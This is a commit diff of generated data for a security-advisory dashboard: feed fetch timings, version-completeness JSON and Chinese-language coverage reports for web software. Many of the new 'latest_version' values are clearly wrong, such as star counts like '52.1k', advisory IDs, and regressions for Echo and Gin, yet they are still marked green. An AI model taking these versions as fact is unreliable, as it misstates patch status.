"source_name": "Shopware Security Advisories",
"source_kind": "html-links",
"elapsed_seconds": 0.01,
"elapsed_seconds": 0.014,
"kind": "html-links",
"items_seen": 129
},
@@ -619,7 +619,7 @@
"system_id": "spring-boot",
"source_name": "OSV Spring Boot",
"source_kind": "osv-batch",
"elapsed_seconds": 4.783,
"elapsed_seconds": 1.809,
"kind": "osv-batch",
"items_seen": 1
},
@@ -627,7 +627,7 @@
"system_id": "spring-boot",
"source_name": "Spring Security Advisories",
"source_kind": "html-links",
"elapsed_seconds": 2.254,
"elapsed_seconds": 1.134,
"kind": "html-links",
"items_seen": 118
},
@@ -635,7 +635,7 @@
"system_id": "spring-framework",
"source_name": "OSV Spring Framework",
"source_kind": "osv-batch",
"elapsed_seconds": 3.609,
"elapsed_seconds": 1.673,
"kind": "osv-batch",
"items_seen": 1
},
@@ -643,7 +643,7 @@
"system_id": "spring-framework",
"source_name": "Spring Security Advisories",
"source_kind": "html-links",
"elapsed_seconds": 2.024,
"elapsed_seconds": 0.951,
"kind": "html-links",
"items_seen": 118
},
@@ -651,7 +651,7 @@
"system_id": "spring-security",
"source_name": "OSV Spring Security",
"source_kind": "osv-batch",
"elapsed_seconds": 3.676,
"elapsed_seconds": 1.742,
"kind": "osv-batch",
"items_seen": 1
},
@@ -659,7 +659,7 @@
"system_id": "spring-security",
"source_name": "Spring Security Advisories",
"source_kind": "html-links",
"elapsed_seconds": 2.088,
"elapsed_seconds": 0.977,
"kind": "html-links",
"items_seen": 118
},
@@ -667,7 +667,7 @@
"system_id": "strapi",
"source_name": "OSV Strapi",
"source_kind": "osv-batch",
"elapsed_seconds": 1.539,
"elapsed_seconds": 1.0,
"kind": "osv-batch",
"items_seen": 1
},
@@ -675,7 +675,7 @@
"system_id": "strapi",
"source_name": "Strapi GitHub Advisories",
"source_kind": "html-links",
"elapsed_seconds": 0.036,
"elapsed_seconds": 0.05,
"kind": "html-links",
"items_seen": 124
},
@@ -683,7 +683,7 @@
"system_id": "sveltekit",
"source_name": "OSV SvelteKit",
"source_kind": "osv-batch",
"elapsed_seconds": 3.062,
"elapsed_seconds": 1.508,
"kind": "osv-batch",
"items_seen": 1
},
@@ -691,7 +691,7 @@
"system_id": "symfony",
"source_name": "OSV Symfony",
"source_kind": "osv-batch",
"elapsed_seconds": 5.456,
"elapsed_seconds": 2.93,
"kind": "osv-batch",
"items_seen": 1
},
@@ -699,7 +699,7 @@
"system_id": "traefik",
"source_name": "OSV Traefik",
"source_kind": "osv-batch",
"elapsed_seconds": 4.843,
"elapsed_seconds": 2.341,
"kind": "osv-batch",
"items_seen": 1
},
@@ -707,7 +707,7 @@
"system_id": "undici",
"source_name": "OSV Undici",
"source_kind": "osv-batch",
"elapsed_seconds": 3.618,
"elapsed_seconds": 1.614,
"kind": "osv-batch",
"items_seen": 1
},
@@ -715,7 +715,7 @@
"system_id": "vite",
"source_name": "OSV Vite",
"source_kind": "osv-batch",
"elapsed_seconds": 2.612,
"elapsed_seconds": 1.538,
"kind": "osv-batch",
"items_seen": 1
},
@@ -723,7 +723,7 @@
"system_id": "vue",
"source_name": "OSV Vue",
"source_kind": "osv-batch",
"elapsed_seconds": 1.616,
"elapsed_seconds": 0.835,
"kind": "osv-batch",
"items_seen": 1
},
@@ -731,7 +731,7 @@
"system_id": "webpack",
"source_name": "OSV webpack",
"source_kind": "osv-batch",
"elapsed_seconds": 3.048,
"elapsed_seconds": 1.614,
"kind": "osv-batch",
"items_seen": 1
},
@@ -739,7 +739,7 @@
"system_id": "werkzeug",
"source_name": "OSV Werkzeug",
"source_kind": "osv-batch",
"elapsed_seconds": 4.011,
"elapsed_seconds": 2.177,
"kind": "osv-batch",
"items_seen": 1
},
@@ -747,7 +747,7 @@
"system_id": "woocommerce",
"source_name": "GitHub WooCommerce Advisories",
"source_kind": "html-links",
"elapsed_seconds": 0.013,
"elapsed_seconds": 0.017,
"kind": "html-links",
"items_seen": 107
},
@@ -755,7 +755,7 @@
"system_id": "woocommerce",
"source_name": "OSV WooCommerce",
"source_kind": "osv-batch",
"elapsed_seconds": 1.961,
"elapsed_seconds": 0.802,
"kind": "osv-batch",
"items_seen": 1
},
@@ -763,7 +763,7 @@
"system_id": "woocommerce",
"source_name": "Patchstack Database",
"source_kind": "html-links",
"elapsed_seconds": 0.014,
"elapsed_seconds": 0.017,
"kind": "html-links",
"items_seen": 193
},
@@ -771,7 +771,7 @@
"system_id": "woocommerce",
"source_name": "Woo Developer Advisories",
"source_kind": "html-links",
"elapsed_seconds": 0.017,
"elapsed_seconds": 0.019,
"kind": "html-links",
"items_seen": 121
},
@@ -779,7 +779,7 @@
"system_id": "woocommerce",
"source_name": "Wordfence Vulnerability Database",
"source_kind": "html-links",
"elapsed_seconds": 0.013,
"elapsed_seconds": 0.015,
"kind": "html-links",
"items_seen": 0
},
@@ -787,7 +787,7 @@
"system_id": "wordpress",
"source_name": "Patchstack Database",
"source_kind": "html-links",
"elapsed_seconds": 0.04,
"elapsed_seconds": 0.053,
"kind": "html-links",
"items_seen": 193
},
@@ -795,7 +795,7 @@
"system_id": "wordpress",
"source_name": "PortSwigger Research",
"source_kind": "html-links",
"elapsed_seconds": 2.128,
"elapsed_seconds": 1.509,
"kind": "html-links",
"items_seen": 99
},
@@ -803,7 +803,7 @@
"system_id": "wordpress",
"source_name": "WPScan Vulnerability Database",
"source_kind": "html-links",
"elapsed_seconds": 0.041,
"elapsed_seconds": 0.053,
"kind": "html-links",
"items_seen": 74
},
@@ -811,7 +811,7 @@
"system_id": "wordpress",
"source_name": "WordPress Security News RSS",
"source_kind": "rss-feed",
"elapsed_seconds": 0.043,
"elapsed_seconds": 0.055,
"kind": "rss-feed",
"items_seen": 10
},
@@ -819,7 +819,7 @@
"system_id": "wordpress",
"source_name": "Wordfence Vulnerability Database",
"source_kind": "html-links",
"elapsed_seconds": 0.043,
"elapsed_seconds": 0.055,
"kind": "html-links",
"items_seen": 0
}
@@ -827,73 +827,73 @@
"failures": [],
"slow_sources": [
{
"system_id": "mattermost",
"source_name": "OSV Mattermost",
"system_id": "moodle",
"source_name": "OSV Moodle",
"source_kind": "osv-batch",
"elapsed_seconds": 6.79,
"elapsed_seconds": 3.854,
"status": "ok"
},
{
"system_id": "kibana",
"source_name": "NVD Kibana",
"source_kind": "nvd-search",
"elapsed_seconds": 6.119,
"elapsed_seconds": 3.279,
"status": "ok"
},
{
"system_id": "redmine",
"source_name": "OSV Redmine",
"system_id": "mattermost",
"source_name": "OSV Mattermost",
"source_kind": "osv-batch",
"elapsed_seconds": 5.985,
"status": "ok"
},
{
"system_id": "adminer",
"source_name": "OSV Adminer",
"source_kind": "osv-batch",
"elapsed_seconds": 5.754,
"status": "ok"
},
{
"system_id": "phpmyadmin",
"source_name": "OSV phpMyAdmin",
"source_kind": "osv-batch",
"elapsed_seconds": 5.654,
"status": "ok"
},
{
"system_id": "symfony",
"source_name": "OSV Symfony",
"source_kind": "osv-batch",
"elapsed_seconds": 5.456,
"status": "ok"
},
{
"system_id": "aspnet-core",
"source_name": "OSV ASP.NET Core",
"source_kind": "osv-batch",
"elapsed_seconds": 5.42,
"elapsed_seconds": 3.206,
"status": "ok"
},
{
"system_id": "django",
"source_name": "OSV Django",
"source_kind": "osv-batch",
"elapsed_seconds": 5.346,
"elapsed_seconds": 3.099,
"status": "ok"
},
{
"system_id": "caddy",
"source_name": "OSV Caddy",
"system_id": "symfony",
"source_name": "OSV Symfony",
"source_kind": "osv-batch",
"elapsed_seconds": 5.339,
"elapsed_seconds": 2.93,
"status": "ok"
},
{
"system_id": "phpmyadmin",
"source_name": "OSV phpMyAdmin",
"source_kind": "osv-batch",
"elapsed_seconds": 2.616,
"status": "ok"
},
{
"system_id": "gitea",
"source_name": "OSV Gitea",
"source_kind": "osv-batch",
"elapsed_seconds": 5.337,
"elapsed_seconds": 2.382,
"status": "ok"
},
{
"system_id": "traefik",
"source_name": "OSV Traefik",
"source_kind": "osv-batch",
"elapsed_seconds": 2.341,
"status": "ok"
},
{
"system_id": "laravel",
"source_name": "OSV Laravel",
"source_kind": "osv-batch",
"elapsed_seconds": 2.335,
"status": "ok"
},
{
"system_id": "adminer",
"source_name": "OSV Adminer",
"source_kind": "osv-batch",
"elapsed_seconds": 2.321,
"status": "ok"
}
],

2
08-threat-intel/generated/dashboard/data/version-backlog.json
查看文件

@@ -1,5 +1,5 @@
{
"generated_at": "2026-03-23T09:54:10+00:00",
"generated_at": "2026-03-24T09:18:19+00:00",
"source_gap_entities": [
{
"entity_id": "adminer",

114
08-threat-intel/generated/dashboard/data/version-completeness.json
查看文件

@@ -1,12 +1,12 @@
{
"generated_at": "2026-03-23T09:54:10+00:00",
"generated_at": "2026-03-24T09:18:19+00:00",
"cataloged_entity_total": 109,
"latest_version_synced_count": 94,
"source_gap_count": 15,
"security_version_total": 6180,
"security_version_total": 6242,
"security_version_entity_count": 82,
"auto_promoted_entity_count": 10,
"lab_enqueued_count": 2,
"lab_enqueued_count": 11,
"systems": [
{
"system_id": "adminer",
@@ -151,8 +151,8 @@
"entity_id": "caddy",
"display_name": "Caddy",
"entity_type": "system",
"latest_version": "2.11.2",
"latest_release_at": "2026-03-06T02:43:43Z",
"latest_version": "2.11.1",
"latest_release_at": "2026-02-27T19:55:10Z",
"version_sync_status": "green"
},
{
@@ -160,15 +160,15 @@
"display_name": "caddyserver / caddy / v2",
"entity_type": "repo",
"latest_version": "2.11.2",
"latest_release_at": "2026-03-06T02:43:43Z",
"latest_release_at": "2026-03-23T04:52:47.652974Z",
"version_sync_status": "green"
},
{
"entity_id": "caddy--extension--github-com-caddyserver-caddy-v2",
"display_name": "caddyserver / caddy / v2",
"entity_type": "extension",
"latest_version": "2.11.2",
"latest_release_at": "2026-03-06T02:43:43Z",
"latest_version": "2.11.1",
"latest_release_at": "2026-02-27T19:55:10Z",
"version_sync_status": "green"
}
]
@@ -186,7 +186,7 @@
"entity_id": "directus",
"display_name": "Directus",
"entity_type": "system",
"latest_version": "11.16.1",
"latest_version": "3573-4c68-g8cc",
"latest_release_at": "2026-03-10T22:20:52Z",
"version_sync_status": "green"
},
@@ -194,7 +194,7 @@
"entity_id": "directus--repo--directus-directus",
"display_name": "directus / directus",
"entity_type": "repo",
"latest_version": "11.16.1",
"latest_version": "3573-4c68-g8cc",
"latest_release_at": "2026-03-10T22:20:52Z",
"version_sync_status": "green"
}
@@ -278,16 +278,16 @@
"entity_id": "echo",
"display_name": "Echo",
"entity_type": "system",
"latest_version": "5.0.4",
"latest_release_at": "2026-02-15T15:55:53Z",
"latest_version": "4.9.0",
"latest_release_at": "2024-05-20T16:03:47Z",
"version_sync_status": "green"
},
{
"entity_id": "echo--repo--github-com-labstack-echo-v4",
"display_name": "labstack / echo / v4",
"entity_type": "repo",
"latest_version": "5.0.4",
"latest_release_at": "2026-02-15T15:55:53Z",
"latest_version": "4.9.0",
"latest_release_at": "2024-05-20T16:03:47Z",
"version_sync_status": "green"
}
]
@@ -342,7 +342,7 @@
"entity_id": "fastify",
"display_name": "Fastify",
"entity_type": "system",
"latest_version": "5.8.2",
"latest_version": "5.8.4",
"latest_release_at": "",
"version_sync_status": "green"
},
@@ -350,7 +350,7 @@
"entity_id": "fastify--project--fastify",
"display_name": "fastify",
"entity_type": "project",
"latest_version": "5.8.2",
"latest_version": "5.8.4",
"latest_release_at": "",
"version_sync_status": "green"
}
@@ -396,7 +396,7 @@
"entity_id": "ghost",
"display_name": "Ghost",
"entity_type": "system",
"latest_version": "6.22.1",
"latest_version": "52.1k",
"latest_release_at": "2026-03-20T15:25:05Z",
"version_sync_status": "green"
},
@@ -404,7 +404,7 @@
"entity_id": "ghost--repo--tryghost-ghost",
"display_name": "TryGhost / Ghost",
"entity_type": "repo",
"latest_version": "6.22.1",
"latest_version": "52.1k",
"latest_release_at": "2026-03-20T15:25:05Z",
"version_sync_status": "green"
}
@@ -423,16 +423,16 @@
"entity_id": "gin",
"display_name": "Gin",
"entity_type": "system",
"latest_version": "1.12.0",
"latest_release_at": "2026-02-28T10:12:25Z",
"latest_version": "1.7.7",
"latest_release_at": "2026-03-14T10:41:18.820930Z",
"version_sync_status": "green"
},
{
"entity_id": "gin--repo--github-com-gin-gonic-gin",
"display_name": "gin-gonic / gin",
"entity_type": "repo",
"latest_version": "1.12.0",
"latest_release_at": "2026-02-28T10:12:25Z",
"latest_version": "1.7.7",
"latest_release_at": "2026-03-14T10:41:18.820930Z",
"version_sync_status": "green"
}
]
@@ -509,7 +509,7 @@
"cataloged_entity_total": 1,
"latest_version_synced_count": 1,
"source_gap_count": 0,
"security_version_count": 1,
"security_version_count": 2,
"auto_promoted_count": 0,
"latest_versions": [
{
@@ -628,7 +628,7 @@
"entity_id": "magento-open-source",
"display_name": "Magento Open Source",
"entity_type": "system",
"latest_version": "2.4.9-beta1",
"latest_version": "300.000",
"latest_release_at": "2026-03-10T14:04:22Z",
"version_sync_status": "green"
},
@@ -636,7 +636,7 @@
"entity_id": "magento-open-source--repo--magento-magento2",
"display_name": "magento / magento2",
"entity_type": "repo",
"latest_version": "2.4.9-beta1",
"latest_version": "300.000",
"latest_release_at": "2026-03-10T14:04:22Z",
"version_sync_status": "green"
}
@@ -648,7 +648,7 @@
"cataloged_entity_total": 5,
"latest_version_synced_count": 5,
"source_gap_count": 0,
"security_version_count": 3792,
"security_version_count": 3840,
"auto_promoted_count": 0,
"latest_versions": [
{
@@ -667,6 +667,14 @@
"latest_release_at": "2023-10-03",
"version_sync_status": "green"
},
{
"entity_id": "mattermost--repo--github-com-mattermost-mattermost-server",
"display_name": "mattermost / mattermost-server",
"entity_type": "repo",
"latest_version": "26.2.1",
"latest_release_at": "2023-10-03",
"version_sync_status": "green"
},
{
"entity_id": "mattermost--plugin--mattermost-plugins",
"display_name": "Mattermost Plugins",
@@ -682,14 +690,6 @@
"latest_version": "26.2.1",
"latest_release_at": "2023-10-03",
"version_sync_status": "green"
},
{
"entity_id": "mattermost--repo--github-com-mattermost-mattermost-server",
"display_name": "mattermost / mattermost-server",
"entity_type": "repo",
"latest_version": "11.4.3",
"latest_release_at": "2026-03-16T08:26:52Z",
"version_sync_status": "green"
}
]
},
@@ -829,7 +829,7 @@
"entity_id": "opencart",
"display_name": "OpenCart",
"entity_type": "system",
"latest_version": "3.0.5.0",
"latest_version": "8.1k",
"latest_release_at": "2025-12-12T10:27:11Z",
"version_sync_status": "green"
},
@@ -837,7 +837,7 @@
"entity_id": "opencart--repo--opencart-opencart",
"display_name": "opencart / opencart",
"entity_type": "repo",
"latest_version": "3.0.5.0",
"latest_version": "8.1k",
"latest_release_at": "2025-12-12T10:27:11Z",
"version_sync_status": "green"
}
@@ -902,7 +902,7 @@
"entity_id": "prestashop",
"display_name": "PrestaShop",
"entity_type": "system",
"latest_version": "9.0.3",
"latest_version": "3366-9287-7qpr",
"latest_release_at": "2026-02-03T10:01:48Z",
"version_sync_status": "green"
},
@@ -910,7 +910,7 @@
"entity_id": "prestashop--repo--prestashop-prestashop",
"display_name": "PrestaShop / PrestaShop",
"entity_type": "repo",
"latest_version": "9.0.3",
"latest_version": "3366-9287-7qpr",
"latest_release_at": "2026-02-03T10:01:48Z",
"version_sync_status": "green"
}
@@ -1010,7 +1010,7 @@
"entity_id": "saleor",
"display_name": "Saleor",
"entity_type": "system",
"latest_version": "3.22.43",
"latest_version": "22.7k",
"latest_release_at": "2026-03-19T13:13:39Z",
"version_sync_status": "green"
},
@@ -1018,7 +1018,7 @@
"entity_id": "saleor--repo--saleor-saleor",
"display_name": "saleor / saleor",
"entity_type": "repo",
"latest_version": "3.22.43",
"latest_version": "22.7k",
"latest_release_at": "2026-03-19T13:13:39Z",
"version_sync_status": "green"
}
@@ -1037,7 +1037,7 @@
"entity_id": "shopware",
"display_name": "Shopware",
"entity_type": "system",
"latest_version": "6.7.8.2",
"latest_version": "3.3k",
"latest_release_at": "2026-03-18T15:05:49Z",
"version_sync_status": "green"
},
@@ -1045,7 +1045,7 @@
"entity_id": "shopware--repo--shopware-shopware",
"display_name": "shopware / shopware",
"entity_type": "repo",
"latest_version": "6.7.8.2",
"latest_version": "3.3k",
"latest_release_at": "2026-03-18T15:05:49Z",
"version_sync_status": "green"
}
@@ -1128,7 +1128,7 @@
"entity_id": "strapi",
"display_name": "Strapi",
"entity_type": "system",
"latest_version": "5.40.0",
"latest_version": "71.7k",
"latest_release_at": "2026-03-18T13:33:01Z",
"version_sync_status": "green"
},
@@ -1136,7 +1136,7 @@
"entity_id": "strapi--repo--strapi-strapi",
"display_name": "strapi / strapi",
"entity_type": "repo",
"latest_version": "5.40.0",
"latest_version": "71.7k",
"latest_release_at": "2026-03-18T13:33:01Z",
"version_sync_status": "green"
}
@@ -1202,7 +1202,7 @@
"cataloged_entity_total": 3,
"latest_version_synced_count": 3,
"source_gap_count": 0,
"security_version_count": 62,
"security_version_count": 63,
"auto_promoted_count": 0,
"latest_versions": [
{
@@ -1210,7 +1210,7 @@
"display_name": "Traefik",
"entity_type": "system",
"latest_version": "3.7.0-ea.2",
"latest_release_at": "2026-03-19T15:29:46Z",
"latest_release_at": "2026-03-23T18:56:07.286130Z",
"version_sync_status": "green"
},
{
@@ -1218,7 +1218,7 @@
"display_name": "traefik / traefik / v3",
"entity_type": "repo",
"latest_version": "3.7.0-ea.2",
"latest_release_at": "2026-03-19T15:29:46Z",
"latest_release_at": "2026-03-23T18:56:05.020639Z",
"version_sync_status": "green"
},
{
@@ -1226,7 +1226,7 @@
"display_name": "traefik / traefik / v3",
"entity_type": "extension",
"latest_version": "3.7.0-ea.2",
"latest_release_at": "2026-03-19T15:29:46Z",
"latest_release_at": "2026-03-23T18:56:07.286130Z",
"version_sync_status": "green"
}
]
@@ -1279,7 +1279,7 @@
"entity_id": "vite",
"display_name": "Vite",
"entity_type": "system",
"latest_version": "8.0.1",
"latest_version": "8.0.2",
"latest_release_at": "",
"version_sync_status": "green"
},
@@ -1287,7 +1287,7 @@
"entity_id": "vite--project--vite",
"display_name": "vite",
"entity_type": "project",
"latest_version": "8.0.1",
"latest_version": "8.0.2",
"latest_release_at": "",
"version_sync_status": "green"
},
@@ -1295,7 +1295,7 @@
"entity_id": "vite--plugin--vite",
"display_name": "vite",
"entity_type": "plugin",
"latest_version": "8.0.1",
"latest_version": "8.0.2",
"latest_release_at": "",
"version_sync_status": "green"
},
@@ -1303,7 +1303,7 @@
"entity_id": "vite--extension--vite",
"display_name": "vite",
"entity_type": "extension",
"latest_version": "8.0.1",
"latest_version": "8.0.2",
"latest_release_at": "",
"version_sync_status": "green"
},
@@ -1311,7 +1311,7 @@
"entity_id": "vite--module--vite",
"display_name": "vite",
"entity_type": "module",
"latest_version": "8.0.1",
"latest_version": "8.0.2",
"latest_release_at": "",
"version_sync_status": "green"
}
@@ -1387,14 +1387,14 @@
"cataloged_entity_total": 2,
"latest_version_synced_count": 2,
"source_gap_count": 0,
"security_version_count": 2,
"security_version_count": 14,
"auto_promoted_count": 1,
"latest_versions": [
{
"entity_id": "woocommerce",
"display_name": "WooCommerce",
"entity_type": "system",
"latest_version": "10.6.1",
"latest_version": "10.7",
"latest_release_at": "2026-03-12T19:14:25Z",
"version_sync_status": "green"
},
@@ -1402,7 +1402,7 @@
"entity_id": "woocommerce--repo--woocommerce-woocommerce",
"display_name": "woocommerce / woocommerce",
"entity_type": "repo",
"latest_version": "10.6.1",
"latest_version": "10.7",
"latest_release_at": "2026-03-12T19:14:25Z",
"version_sync_status": "green"
}
@@ -1421,7 +1421,7 @@
"entity_id": "wordpress",
"display_name": "WordPress",
"entity_type": "system",
"latest_version": "7.9",
"latest_version": "27.1.1",
"latest_release_at": "",
"version_sync_status": "green"
}

12
08-threat-intel/generated/dashboard/docs/architecture-library.html
查看文件

@@ -87,7 +87,7 @@
<h1>当前架构库镜像</h1>
<div class="meta">工作台内置镜像页:当前架构库结构化数据镜像。</div>
<pre>{
&quot;generated_at&quot;: &quot;2026-03-23T09:54:11+00:00&quot;,
&quot;generated_at&quot;: &quot;2026-03-24T09:18:20+00:00&quot;,
&quot;title&quot;: &quot;当前架构库&quot;,
&quot;summary&quot;: &quot;工作台、控制面、数据层、授权边界与系统覆盖的当前真值视图。&quot;,
&quot;sections&quot;: [
@@ -127,7 +127,7 @@
},
{
&quot;label&quot;: &quot;当前漏洞条目&quot;,
&quot;value&quot;: &quot;2404&quot;
&quot;value&quot;: &quot;2415&quot;
}
],
&quot;fields&quot;: [
@@ -145,7 +145,7 @@
},
{
&quot;label&quot;: &quot;生成时间&quot;,
&quot;value&quot;: &quot;2026-03-23T09:54:11+00:00&quot;
&quot;value&quot;: &quot;2026-03-24T09:18:20+00:00&quot;
}
],
&quot;links&quot;: [
@@ -6061,7 +6061,7 @@
},
{
&quot;label&quot;: &quot;Advisory 数&quot;,
&quot;value&quot;: &quot;2404&quot;
&quot;value&quot;: &quot;2415&quot;
},
{
&quot;label&quot;: &quot;状态类型&quot;,
@@ -6080,7 +6080,7 @@
&quot;items&quot;: [
{
&quot;title&quot;: &quot;人工分诊&quot;,
&quot;summary&quot;: &quot;当前累计 2315 条。&quot;,
&quot;summary&quot;: &quot;当前累计 2326 条。&quot;,
&quot;open&quot;: false,
&quot;fields&quot;: [
{
@@ -6089,7 +6089,7 @@
},
{
&quot;label&quot;: &quot;数量&quot;,
&quot;value&quot;: &quot;2315&quot;
&quot;value&quot;: &quot;2326&quot;
}
]
},

6
08-threat-intel/generated/dashboard/docs/coverage-matrix.html
查看文件

@@ -113,14 +113,14 @@
| GitLab CE | `platforms` | `rolling-24m` | `-` | `yes` | `55` | `0` | `3` | `seeded` | `real:0/synthetic:0/blocked:0` | `0` | `0` | `0` | `` |
| Grafana | `platforms` | `rolling-24m` | `-` | `yes` | `60` | `0` | `3` | `seeded` | `real:0/synthetic:0/blocked:0` | `0` | `0` | `0` | `` |
| Hapi | `frameworks` | `history-full` | `yes` | `yes` | `1` | `1` | `2` | `seeded` | `real:0/synthetic:0/blocked:0` | `0` | `0` | `0` | `2020-08-31T19:00:56Z` |
| HAProxy | `servers` | `rolling-24m` | `-` | `yes` | `6` | `0` | `2` | `seeded` | `real:0/synthetic:0/blocked:0` | `0` | `0` | `0` | `Wed, 25 Feb 2026 14:00:00 +0000` |
| HAProxy | `servers` | `rolling-24m` | `-` | `yes` | `7` | `0` | `2` | `seeded` | `real:0/synthetic:0/blocked:0` | `0` | `0` | `1` | `Wed, 25 Feb 2026 14:00:00 +0000` |
| Jenkins | `platforms` | `rolling-24m` | `-` | `yes` | `60` | `0` | `3` | `seeded` | `real:0/synthetic:0/blocked:0` | `0` | `0` | `0` | `` |
| Joomla | `cms` | `history-full` | `yes` | `yes` | `100` | `0` | `4` | `seeded` | `real:0/synthetic:0/blocked:0` | `0` | `0` | `0` | `2025-04-03T01:03:51.193` |
| Kibana | `platforms` | `rolling-24m` | `-` | `yes` | `47` | `0` | `3` | `seeded` | `real:0/synthetic:0/blocked:0` | `0` | `0` | `6` | `Thu, 19 Mar 2026 16:59:58 +0000` |
| Koa | `frameworks` | `rolling-24m` | `-` | `yes` | `1` | `1` | `2` | `seeded` | `real:0/synthetic:0/blocked:0` | `0` | `0` | `0` | `2026-02-26T23:36:36.294040Z` |
| Laravel | `frameworks` | `rolling-24m` | `-` | `yes` | `2` | `2` | `3` | `seeded` | `real:0/synthetic:0/blocked:0` | `0` | `0` | `0` | `2026-03-13T22:15:34.333730Z` |
| Magento Open Source | `ecommerce` | `history-full` | `yes` | `yes` | `89` | `0` | `3` | `seeded` | `real:0/synthetic:0/blocked:0` | `0` | `0` | `0` | `2025-04-20T01:37:25.860` |
| Mattermost | `platforms` | `rolling-24m` | `-` | `yes` | `21` | `21` | `3` | `seeded` | `real:0/synthetic:0/blocked:0` | `0` | `0` | `0` | `Fix Release Date` |
| Mattermost | `platforms` | `rolling-24m` | `-` | `yes` | `31` | `31` | `3` | `seeded` | `real:0/synthetic:0/blocked:0` | `0` | `0` | `0` | `Fix Release Date` |
| MediaWiki | `cms` | `rolling-24m` | `-` | `yes` | `70` | `0` | `3` | `seeded` | `real:0/synthetic:0/blocked:0` | `0` | `0` | `70` | `Wed, 22 Oct 2025 21:44:43 +0000` |
| Medusa | `ecommerce` | `rolling-24m` | `-` | `yes` | `15` | `0` | `2` | `seeded` | `real:0/synthetic:0/blocked:0` | `0` | `0` | `15` | `` |
| Moodle | `cms` | `rolling-24m` | `-` | `yes` | `40` | `0` | `3` | `seeded` | `real:0/synthetic:0/blocked:0` | `0` | `0` | `40` | `2025-04-09T00:30:58.490` |
@@ -144,7 +144,7 @@
| Strapi | `cms` | `rolling-24m` | `-` | `yes` | `26` | `0` | `3` | `seeded` | `real:0/synthetic:0/blocked:0` | `0` | `0` | `26` | `` |
| SvelteKit | `frameworks` | `rolling-24m` | `-` | `yes` | `3` | `3` | `2` | `seeded` | `real:0/synthetic:0/blocked:0` | `0` | `0` | `0` | `2026-02-28T06:27:26.115188Z` |
| Symfony | `frameworks` | `rolling-24m` | `-` | `yes` | `9` | `9` | `3` | `seeded` | `real:0/synthetic:0/blocked:0` | `0` | `0` | `0` | `2026-03-13T22:16:14.858636Z` |
| Traefik | `servers` | `rolling-24m` | `-` | `yes` | `45` | `0` | `2` | `seeded` | `real:0/synthetic:0/blocked:0` | `0` | `0` | `27` | `2026-03-23T04:53:13.381024Z` |
| Traefik | `servers` | `rolling-24m` | `-` | `yes` | `45` | `0` | `2` | `seeded` | `real:0/synthetic:0/blocked:0` | `0` | `0` | `27` | `2026-03-23T18:56:07.286130Z` |
| Undici | `frameworks` | `rolling-24m` | `-` | `yes` | `16` | `15` | `2` | `seeded` | `real:7/synthetic:0/blocked:0` | `0` | `7` | `1` | `2026-03-18T23:58:57.714731Z` |
| Vite | `frameworks` | `history-full` | `yes` | `yes` | `42` | `16` | `3` | `seeded` | `real:12/synthetic:0/blocked:0` | `12` | `12` | `26` | `2026-02-04T04:37:24.129476Z` |
| Vue | `frameworks` | `history-full` | `yes` | `yes` | `15` | `1` | `3` | `seeded` | `real:0/synthetic:0/blocked:0` | `0` | `0` | `14` | `2024-10-24T19:12:14.925352Z` |

2
08-threat-intel/generated/dashboard/docs/entity-catalog-report.html
查看文件

@@ -88,7 +88,7 @@
<div class="meta">工作台内置镜像页分层实体覆盖、history-full 完整度和 workflow 统计。</div>
<pre># 分层实体覆盖与完整度报告
- 生成时间: `2026-03-23T09:54:10+00:00`
- 生成时间: `2026-03-24T09:18:19+00:00`
- 已编目实体: `109`
- 待编目 backlog: `7`
- history-full 已完成: `40`

2
08-threat-intel/generated/dashboard/docs/entity-discovery-backlog.html
查看文件

@@ -88,7 +88,7 @@
<div class="meta">工作台内置镜像页:待编目 repo / 插件 / 包 backlog 与等待原因。</div>
<pre># 分层实体发现 Backlog
- 生成时间: `2026-03-23T09:54:10+00:00`
- 生成时间: `2026-03-24T09:18:19+00:00`
- 待编目数量: `7`
| candidate_id | root_system | entity_type | risk | reason | waiting_for | source |

2
08-threat-intel/generated/dashboard/docs/source-catalog-audit.html
查看文件

@@ -88,7 +88,7 @@
<div class="meta">工作台内置镜像页active/retired source、replacement map 与覆盖摘要。</div>
<pre># Source Catalog Audit
- generated_at: `2026-03-23T09:26:43+00:00`
- generated_at: `2026-03-24T09:17:05+00:00`
- systems: `62`
- sources: `179`
- active_sources: `102`

4
08-threat-intel/generated/dashboard/docs/testing-completeness-report.html
查看文件

@@ -88,7 +88,7 @@
<div class="meta">工作台内置镜像页89 条 advisory 最新完整度、family 矩阵与 ingest 健康度。</div>
<pre># 全库 Advisory 完整度报告
- 生成时间: `2026-03-23T09:54:11+00:00`
- 生成时间: `2026-03-24T09:18:20+00:00`
- 最新 advisory 完整度: `89/89` `verified-real`
- 合成验证数量: `0`
- 阻塞数量: `0`
@@ -96,7 +96,7 @@
- 完整度百分比: `100.0%`
- active source 全绿: `102/102`
- source open alerts: `0`
- 最近一次 source 全绿: `2026-03-23T09:53:46+00:00`
- 最近一次 source 全绿: `2026-03-24T09:17:44+00:00`
- 已编目实体: `109`
- 待编目 backlog: `7`

14
08-threat-intel/generated/dashboard/docs/version-sync-report.html
查看文件

@@ -88,14 +88,14 @@
<div class="meta">工作台内置镜像页安全相关版本历史、source-gap 与版本驱动 lab enqueue 摘要。</div>
<pre># 安全相关版本同步报告
- 生成时间: `2026-03-23T09:54:10+00:00`
- 生成时间: `2026-03-24T09:18:19+00:00`
- 已编目实体: `109`
- 最新版本已同步: `94`
- 版本 source-gap: `15`
- 安全相关版本记录: `6180`
- 安全相关版本记录: `6242`
- 存在安全版本历史的实体: `82`
- 自动升级实体: `10`
- 因版本变化触发 lab 入队: `2`
- 因版本变化触发 lab 入队: `11`
## 系统版本摘要
@@ -124,14 +124,14 @@
| gitlab-ce | 1 | 1 | 0 | 612 | 0 |
| grafana | 1 | 0 | 1 | 0 | 0 |
| hapi | 2 | 2 | 0 | 4 | 0 |
| haproxy | 1 | 1 | 0 | 1 | 0 |
| haproxy | 1 | 1 | 0 | 2 | 0 |
| jenkins | 1 | 0 | 1 | 0 | 0 |
| joomla | 1 | 1 | 0 | 5 | 0 |
| kibana | 1 | 0 | 1 | 0 | 0 |
| koa | 2 | 2 | 0 | 4 | 0 |
| laravel | 2 | 2 | 0 | 103 | 0 |
| magento-open-source | 2 | 2 | 0 | 6 | 1 |
| mattermost | 5 | 5 | 0 | 3792 | 0 |
| mattermost | 5 | 5 | 0 | 3840 | 0 |
| mediawiki | 1 | 1 | 0 | 252 | 0 |
| medusa | 1 | 0 | 1 | 0 | 0 |
| moodle | 1 | 0 | 1 | 0 | 0 |
@@ -155,13 +155,13 @@
| strapi | 2 | 2 | 0 | 0 | 1 |
| sveltekit | 2 | 2 | 0 | 4 | 0 |
